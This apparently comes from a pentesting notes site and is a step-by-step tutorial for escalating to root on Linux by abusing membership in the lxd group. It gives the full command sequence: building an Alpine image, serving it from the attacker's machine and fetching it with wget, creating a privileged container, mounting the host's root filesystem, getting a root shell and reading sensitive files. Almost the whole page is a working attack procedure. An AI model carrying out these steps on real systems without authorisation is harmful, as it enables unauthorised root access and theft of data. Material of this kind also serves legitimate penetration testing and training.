Page cover image

LXC/LXD (Linux Container/Daemon) Privilege Escalation

LXD is a container management extension for Linux Containers (LXC).

  1. Check if You are in the Lxd Group

    If you belong to the Lxd group, you may be able to the root privileges.

    groups
    id
    Copied!
  2. Check if Container Image Exists

    List all images and check if a container image already exists.

    lxc image list
    Copied!

    If there are not container, build a new image in your local machine.

    git clone  https://github.com/saghul/lxd-alpine-builder.git
    cd lxd-alpine-builder
    sudo ./build-alpine
    python3 -m http.server 8000
    Copied!

    In remote machine, download the “alpine-*.tar.gz” and import it.

    wget http://<local-ip>:8000/alpine-v3.17-x86_64-20221206_0615.tar.gz
    lxc image import ./alpine-v3.17-x86_64-20221206_0615.tar.gz --alias testimage
    lxc image list
    Copied!

    After that, create a new container from the image.

    lxc init testimage testcontainer -c security.privileged=true
    Copied!

    If you got the error “No storage pool found. Please create a new storage pool.”, initialize the lxd at first.

    lxd init
    # Set default values in prompt
    Copied!

    Then create a new container as above command.

  3. Mount the New Container to Root Directory

    Now mount the host's / directory onto /mnt/root in the container you created.

    lxc config device add testcontainer testdevice disk source=/ path=/mnt/root recursive=true
    Copied!
  4. Start the Container

    lxc start testcontainer
    Copied!
  5. Get a Shell

    lxc exec testcontainer /bin/sh
    Copied!

    Check if you are root.

    whoami
    Copied!
  6. Retrieve the Sensitive Information in the Mounted Directory

    cd /mnt/root/

Last updated